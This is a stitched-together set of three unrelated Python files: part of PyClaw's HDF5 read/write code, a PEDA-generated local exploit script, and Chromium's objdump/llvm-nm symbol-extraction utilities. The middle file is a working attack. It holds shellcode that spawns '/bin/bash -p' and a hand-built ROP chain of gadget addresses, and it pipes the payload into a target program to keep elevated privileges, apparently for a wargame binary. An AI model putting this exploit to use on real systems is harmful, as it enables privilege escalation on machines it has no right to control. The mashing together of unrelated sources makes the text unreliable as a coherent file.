compression=compression,
compression_opts=compression_opts,
chunks=chunks,shuffle=shuffle,
fletcher32=fletcher32)
# Flush and close the file
f.close()
# Write out using PyTables
elif use_PyTables:
# f = tables.openFile(filename, mode = "w", title = options['title'])
logging.critical("PyTables has not been implemented yet.")
raise IOError("PyTables has not been implemented yet.")
else:
err_msg = "No hdf5 python modules available."
logging.critical(err_msg)
raise Exception(err_msg)
def read_hdf5(solution,frame,path='./',file_prefix='claw',read_aux=True,
options={}):
r"""
Read in a HDF5 file into a Solution
:Input:
- *solution* - (:class:`~pyclaw.solution.Solution`) Pyclaw object to be
output
- *frame* - (int) Frame number
- *path* - (string) Root path
- *file_prefix* - (string) Prefix for the file name. ``default = 'claw'``
- *write_aux* - (bool) Boolean controlling whether the associated
auxiliary array should be written out. ``default = False``
- *options* - (dict) Optional argument dictionary, unused for reading.
"""
# Option parsing
option_defaults = {}
for (k,v) in option_defaults.iteritems():
if options.has_key(k):
exec("%s = options['%s']" % (k,k))
else:
exec('%s = v' % k)
# File name
filename = os.path.join(path,'%s%s.hdf' %
(file_prefix,str(frame).zfill(4)))
if use_h5py:
f = h5py.File(filename,'r')
for subgroup in f.iterobjects():
# Construct each dimension
dimensions = []
dim_names = subgroup.attrs['dimensions']
for dim_name in dim_names:
# Create dimension
dim = pyclaw.solution.Dimension(dim_name,
subgroup.attrs["%s.lower" % dim_name],
subgroup.attrs["%s.upper" % dim_name],
subgroup.attrs["%s.n" % dim_name])
# Optional attributes
for attr in ['mthbc_lower','mthbc_upper','units']:
attr_name = "%s.%s" % (dim_name,attr)
if subgroup.attrs.get(attr_name, None):
setattr(dim,attr,subgroup.attrs["%s.%s" % (dim_name,attr)])
dimensions.append(dim)
# Create grid
grid = pyclaw.solution.Grid(dimensions)
# Fetch general grid properties
for attr in ['t','meqn','gridno','level']:
setattr(grid,attr,subgroup.attrs[attr])
# Read in q
index_str = ','.join( [':' for i in xrange(len(subgroup['q'].shape))] )
exec("grid.q = subgroup['q'][%s]" % index_str)
# Read in aux if applicable
if read_aux and subgroup.get('aux',None) is not None:
index_str = ','.join( [':' for i in xrange(len(subgroup['aux'].shape))] )
exec("grid.aux = subgroup['aux'][%s]" % index_str)
solution.grids.append(grid)
# Flush and close the file
f.close()
elif use_PyTables:
# f = tables.openFile(filename, mode = "r", title = options['title'])
logging.critical("PyTables has not been implemented yet.")
raise IOError("PyTables has not been implemented yet.")
else:
err_msg = "No hdf5 python modules available."
logging.critical(err_msg)
raise Exception(err_msg)
| |
#!/usr/bin/env python
#
# Template for local stdin exploit code, generated by PEDA
#
import os
import sys
import struct
import resource
import time
"""
Registers contain pattern buffer:
EIP+0 found at offset: 36
EBX+0 found at offset: 20
EDI+0 found at offset: 28
EBP+0 found at offset: 32
ESI+0 found at offset: 24
Registers point to pattern buffer:
[EDX] --> offset 4 - size ~203
[ECX] --> offset 4 - size ~203
[ESP] --> offset 40 - size ~203
Pattern buffer found at:
0xffffcf2c : offset 4 - size 555 ($sp + -0x24 [-9 dwords])
References to pattern buffer found at:
0xffffce68 : 0xffffcf2c ($sp + -0xe8 [-58 dwords])
0xffffcea8 : 0xffffcf2c ($sp + -0xa8 [-42 dwords])
0xffffced8 : 0xffffcf2c ($sp + -0x78 [-30 dwords])
0xffffcef0 : 0xffffcf2c ($sp + -0x60 [-24 dwords])
0xffffcf04 : 0xffffcf2c ($sp + -0x4c [-19 dwords])
0xffffcf1c : 0xffffcf2c ($sp + -0x34 [-13 dwords])
"""
sc = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"
def usage():
print "Usage: %s target_program" % sys.argv[0]
return
def pattern(size=1024, start=0):
try:
bytes = open("pattern.txt").read(size+start)
return bytes[start:]
except:
return "A"*size
def nops(size=1024):
return "\x90"*size
def int2hexstr(num, intsize=4):
if intsize == 8:
if num < 0:
result = struct.pack("<q", num)
else:
result = struct.pack("<Q", num)
else:
if num < 0:
result = struct.pack("<l", num)
else:
result = struct.pack("<L", num)
return result
i2hs = int2hexstr
def list2hexstr(intlist, intsize=4):
result = ""
for value in intlist:
if isinstance(value, str):
result += value
else:
result += int2hexstr(value, intsize)
return result
l2hs = list2hexstr
from subprocess import *
'''
push $0xb
pop %eax
cltd
push %edx
pushw $0x702d
mov %esp,%ecx
push %edx
push $0x68
push $0x7361622f
push $0x6e69622f
mov %esp,%ebx
push %edx
push %ecx
push %ebx
mov %esp,%ecx
int $0x80
'''
def exploit(vuln):
base = 0x0f000000
# 0x0000051b: int 0x80 ; (1 found)
push_ebx = base + 0x0000112a # debile
push_ecx = base + 0x000081c4 # ...
add_esi_eax = base + 0x000077e0
add_ecx_ebp = base + 0x00002416
pop_eax = base + 0x00001733
pop_ebx = base + 0x00000cd3
pop_ecx = base + 0x00002771
pop_edx = base + 0x000006f5
pop_esi = base + 0x000023d5
pop_ebp = base + 0x00002de2
dec_eax = base + 0x0000482f
dec_ebx = base + 0x0000351b
x_eax_ebx = base + 0x00003380
x_eax_ecx = base + 0x00004e1d
x_eax_edx = base + 0x0000198d
x_eax_esi = base + 0x0000191c
x_eax_edi = base + 0x00002bd3
x_pesi_ebx = base + 0x000049fc
mov_pecx_ebx = base + 0x00006868
save_esp_ecx = base + 0x00006aba
int80 = base + 0x51b
# edx = 0
rop_stack = i2hs(pop_edx)
rop_stack+= i2hs(0x0)
# ebx = esp + off
# string -> esi
rop_stack+= i2hs(save_esp_ecx)
rop_stack+= i2hs(pop_ebp)
rop_stack+= i2hs(0xd4 - 0x48) # first arg
rop_stack+= i2hs(add_ecx_ebp)
rop_stack+= i2hs(x_eax_ecx)
rop_stack+= i2hs(x_eax_ebx)
rop_stack+= i2hs(save_esp_ecx)
rop_stack+= i2hs(pop_ebp)
rop_stack+= i2hs(0xc8 - 0x60) # 1st arg
rop_stack+= i2hs(add_ecx_ebp)
rop_stack+= i2hs(mov_pecx_ebx) # [off] = val
rop_stack+= i2hs(x_eax_ebx)
rop_stack+= i2hs(x_eax_esi)
rop_stack+= i2hs(x_eax_ecx)
rop_stack+= i2hs(x_eax_edi)
# ecx = esp + off
# debut struct
rop_stack+= i2hs(save_esp_ecx)
rop_stack+= i2hs(pop_ebp)
rop_stack+= i2hs(0xe4 - 0x84) # offset -p
rop_stack+= i2hs(add_ecx_ebp)
rop_stack+= i2hs(x_eax_ecx)
rop_stack+= i2hs(x_eax_ebx)
rop_stack+= i2hs(save_esp_ecx)
rop_stack+= i2hs(pop_ebp)
rop_stack+= i2hs(0xcc - 0x9c) # 2nd arg
rop_stack+= i2hs(add_ecx_ebp)
rop_stack+= i2hs(mov_pecx_ebx) # [off] = val
rop_stack+= i2hs(x_eax_esi) # restore
rop_stack+= i2hs(x_eax_ebx)
rop_stack+= i2hs(x_eax_edi)
rop_stack+= i2hs(x_eax_ecx)
# eax = 0xb
rop_stack+= i2hs(pop_eax)
rop_stack+= i2hs(0xb)
# int 0x80
rop_stack+= i2hs(int80)
rop_stack+= "JONK"
rop_stack+= "JUNK"
rop_stack+= i2hs(0x0)
rop_stack+= i2hs(0x6e69622f)
rop_stack+= i2hs(0x7361622f)
rop_stack+= i2hs(0x68)
rop_stack+= i2hs(0x0)
rop_stack+= i2hs(0x702d)
rop_stack+= i2hs(0x0)
#rop_stack+= i2hs()
padding = pattern(0)
payload = [padding]
payload += [ "AAAA" + nops(32) + rop_stack] # put your payload here
payload = list2hexstr(payload)
f = open("inp", "w")
f.write(payload)
f.close()
env = {"PEDA":nops()}
args = sys.argv[1:]
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
P = Popen(args, stdin=PIPE)
P.stdin.write(payload + "\n")
while True:
line = sys.stdin.readline()
P.poll()
ret = P.returncode
if ret is None:
P.stdin.write(line)
else:
if ret == -11:
print "Child program crashed with SIGSEGV"
else:
print "Child program exited with code %d" % ret
break
if __name__ == "__main__":
if len(sys.argv) < 2:
usage()
else:
exploit(sys.argv[1])
| |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utilities to get and manipulate symbols from a binary."""
import collections
import logging
import os
import re
import subprocess
import sys
import cygprofile_utils
START_OF_TEXT_SYMBOL = 'linker_script_start_of_text'
_SRC_PATH = os.path.abspath(os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir))
_TOOL_PREFIX = os.path.join(_SRC_PATH, 'third_party', 'llvm-build',
'Release+Asserts', 'bin', 'llvm-')
_MAX_WARNINGS_TO_PRINT = 200
SymbolInfo = collections.namedtuple('SymbolInfo', ('name', 'offset', 'size',
'section'))
# Regular expression to match lines printed by 'objdump -t -w'. An example of
# such line looks like this:
# 018db2de l F .text 00000060 .hidden _ZN8SkBitmapC2ERKS_
#
# The regex intentionally allows matching more than valid inputs. This gives
# more protection against potentially incorrectly silently ignoring unmatched
# input lines. Instead a few assertions early in _FromObjdumpLine() check the
# validity of a few parts matched as groups.
_OBJDUMP_LINE_RE = re.compile(
r'''
# The offset of the function, as hex.
(?P<offset>^[0-9a-f]+)
# The space character.
[ ]
# The 7 groups of flag characters, one character each.
(
(?P<assert_scope>.) # Global, local, unique local, etc.
(?P<assert_weak_or_strong>.)
(?P<assert_4spaces>.{4}) # Constructor, warning, indirect ref,
# debugger symbol.
(?P<symbol_type>.) # Function, object, file or normal.
)
[ ]
# The section name should start with ".text", can be ".text.foo". With LLD,
# and especially LTO the traces of input sections are not preserved. Support
# ".text.foo" for a little longer time because it is easy.
(?P<section>.text[^0-9a-f]*)
(?P<assert_tab> \s+)
# The size of the symbol, as hex.
(?P<size>[0-9a-f]+)
[ ]+
# Hidden symbols should be treated as usual.
(.hidden [ ])?
# The symbol name.
(?P<name>.*)
$
''', re.VERBOSE)
def _FromObjdumpLine(line):
"""Create a SymbolInfo by parsing a properly formatted objdump output line.
Args:
line: line from objdump
Returns:
An instance of SymbolInfo if the line represents a symbol, None otherwise.
"""
m = _OBJDUMP_LINE_RE.match(line)
if not m:
return None
# A symbol can be (g)lobal, (l)ocal, or neither (a space). Per objdump's
# manpage, "A symbol can be neither local or global for a variety of reasons".
assert m.group('assert_scope') in set(['g', 'l', ' ']), line
assert m.group('assert_weak_or_strong') in set(['w', ' ']), line
assert m.group('assert_tab') == '\t', line
assert m.group('assert_4spaces') == ' ' * 4, line
name = m.group('name')
offset = int(m.group('offset'), 16)
# Output the label that contains the earliest offset. It is needed later for
# translating offsets from the profile dumps.
if name == START_OF_TEXT_SYMBOL:
return SymbolInfo(name=name, offset=offset, section='.text', size=0)
# Check symbol type for validity and ignore some types.
# From objdump manual page: The symbol is the name of a function (F) or a file
# (f) or an object (O) or just a normal symbol (a space). The 'normal' symbols
# seens so far has been function-local labels.
symbol_type = m.group('symbol_type')
if symbol_type == ' ':
# Ignore local goto labels. Unfortunately, v8 builtins (like 'Builtins_.*')
# are indistinguishable from labels of size 0 other than by name.
return None
# Guard against file symbols, since they are normally not seen in the
# binaries we parse.
assert symbol_type != 'f', line
# Extract the size from the ELF field. This value sometimes does not reflect
# the real size of the function. One reason for that is the '.size' directive
# in the assembler. As a result, a few functions in .S files have the size 0.
# They are not instrumented (yet), but maintaining their order in the
# orderfile may be important in some cases.
size = int(m.group('size'), 16)
# Forbid ARM mapping symbols and other unexpected symbol names, but allow $
# characters in a non-initial position, which can appear as a component of a
# mangled name, e.g. Clang can mangle a lambda function to:
# 02cd61e0 l F .text 000000c0 _ZZL11get_globalsvENK3$_1clEv
# The equivalent objdump line from GCC is:
# 0325c58c l F .text 000000d0 _ZZL11get_globalsvENKUlvE_clEv
#
# Also disallow .internal and .protected symbols (as well as other flags),
# those have not appeared in the binaries we parse. Rejecting these extra
# prefixes is done by disallowing spaces in symbol names.
assert re.match('^[a-zA-Z0-9_.][a-zA-Z0-9_.$]*$', name), name
return SymbolInfo(name=name, offset=offset, section=m.group('section'),
size=size)
def _SymbolInfosFromStream(objdump_lines):
"""Parses the output of objdump, and get all the symbols from a binary.
Args:
objdump_lines: An iterable of lines
Returns:
A list of SymbolInfo.
"""
name_to_offsets = collections.defaultdict(list)
symbol_infos = []
for line in objdump_lines:
symbol_info = _FromObjdumpLine(line.decode('utf-8').rstrip('\n'))
if symbol_info is not None:
# On ARM the LLD linker inserts pseudo-functions (thunks) that allow
# jumping distances farther than 16 MiB. Such thunks are known to often
# reside on multiple offsets, they are not instrumented and hence they do
# not reach the orderfiles. Exclude the thunk symbols from the warning.
if not symbol_info.name.startswith('__ThumbV7PILongThunk_'):
name_to_offsets[symbol_info.name].append(symbol_info.offset)
symbol_infos.append(symbol_info)
# Outlined functions are known to be repeated often, so ignore them in the
# repeated symbol count.
repeated_symbols = list(
filter(lambda s: len(name_to_offsets[s]) > 1,
(k for k in name_to_offsets.keys()
if not k.startswith('OUTLINED_FUNCTION_'))))
if repeated_symbols:
# Log the first 5 repeated offsets of the first 10 repeated symbols.
logging.warning('%d symbols repeated with multiple offsets:\n %s',
len(repeated_symbols), '\n '.join(
'{} {}'.format(sym, ' '.join(
str(offset) for offset in name_to_offsets[sym][:5]))
for sym in repeated_symbols[:10]))
return symbol_infos
def SymbolInfosFromBinary(binary_filename):
"""Runs objdump to get all the symbols from a binary.
Args:
binary_filename: path to the binary.
Returns:
A list of SymbolInfo from the binary.
"""
command = [_TOOL_PREFIX + 'objdump', '-t', '-w', binary_filename]
try:
p = subprocess.Popen(command, stdout=subprocess.PIPE)
except OSError as error:
logging.error("Failed to execute the command: path=%s, binary_filename=%s",
command[0], binary_filename)
raise error
try:
return _SymbolInfosFromStream(p.stdout)
finally:
p.stdout.close()
p.wait()
_LLVM_NM_LINE_RE = re.compile(
r'^[\-0-9a-f]{8,16}[ ](?P<symbol_type>.)[ ](?P<name>.*)$', re.VERBOSE)
def _SymbolInfosFromLlvmNm(lines):
"""Extracts all defined symbols names from llvm-nm output.
Only defined (weak and regular) symbols are extracted.
Args:
lines: Iterable of lines.
Returns:
[str] A list of symbol names, can be empty.
"""
symbol_names = []
for line in lines:
line = line.decode('utf-8')
m = _LLVM_NM_LINE_RE.match(line)
assert m is not None, line
if m.group('symbol_type') not in ['t', 'T', 'w', 'W']:
continue
symbol_names.append(m.group('name'))
return symbol_names
_NM_PATH = os.path.join(_SRC_PATH, 'third_party', 'llvm-build',
'Release+Asserts', 'bin', 'llvm-nm')
def CheckLlvmNmExists():
assert os.path.exists(_NM_PATH), (
'llvm-nm not found. Please run '
'//tools/clang/scripts/update.py --package=objdump to install it.')
def SymbolNamesFromLlvmBitcodeFile(filename):
"""Extracts all defined symbols names from an LLVM bitcode file.
Args:
filename: (str) File to parse.
Returns:
[str] A list of symbol names, can be empty.
"""
command = (_NM_PATH, '--defined-only', filename)
p = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
result = _SymbolInfosFromLlvmNm(p.stdout)
if not result:
file_size = os.stat(filename).st_size
logging.warning('No symbols for %s (size %d)', filename, file_size)
return result
finally:
_, _ = p.communicate()
p.stdout.close()
assert p.wait() == 0
def GroupSymbolInfosByOffset(symbol_infos):
"""Create a dict {offset: [symbol_info1, ...], ...}.
As several symbols can be at the same offset, this is a 1-to-many
relationship.
Args:
symbol_infos: iterable of SymbolInfo instances
Returns:
a dict {offset: [symbol_info1, ...], ...}
"""
offset_to_symbol_infos = collections.defaultdict(list)
for symbol_info in symbol_infos:
offset_to_symbol_infos[symbol_info.offset].append(symbol_info)
return dict(offset_to_symbol_infos)
def GroupSymbolInfosByName(symbol_infos):
"""Create a dict {name: [symbol_info1, ...], ...}.
A symbol can have several offsets, this is a 1-to-many relationship.
Args:
symbol_infos: iterable of SymbolInfo instances
Returns:
a dict {name: [symbol_info1, ...], ...}
"""
name_to_symbol_infos = collections.defaultdict(list)
for symbol_info in symbol_infos:
name_to_symbol_infos[symbol_info.name].append(symbol_info)
return dict(name_to_symbol_infos)
def CreateNameToSymbolInfo(symbol_infos):
"""Create a dict {name: symbol_info, ...}.
Args:
symbol_infos: iterable of SymbolInfo instances
Returns:
a dict {name: symbol_info, ...}
If a symbol name corresponds to more than one symbol_info, the symbol_info
with the lowest offset is chosen.
"""
# TODO(lizeb,pasko): move the functionality in this method into
# check_orderfile.
symbol_infos_by_name = {}
warnings = cygprofile_utils.WarningCollector(_MAX_WARNINGS_TO_PRINT)
for infos in GroupSymbolInfosByName(symbol_infos).values():
first_symbol_info = min(infos, key=lambda x: x.offset)
symbol_infos_by_name[first_symbol_info.name] = first_symbol_info
if len(infos) > 1:
warnings.Write('Symbol %s appears at %d offsets: %s' %
(first_symbol_info.name,
len(infos),
','.join([hex(x.offset) for x in infos])))
warnings.WriteEnd('symbols at multiple offsets.')
return symbol_infos_by_name
def DemangleSymbol(mangled_symbol):
"""Return the demangled form of mangled_symbol."""
cmd = [_TOOL_PREFIX + 'cxxfilt', mangled_symbol]
return subprocess.check_output(cmd, universal_newlines=True).rstrip()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.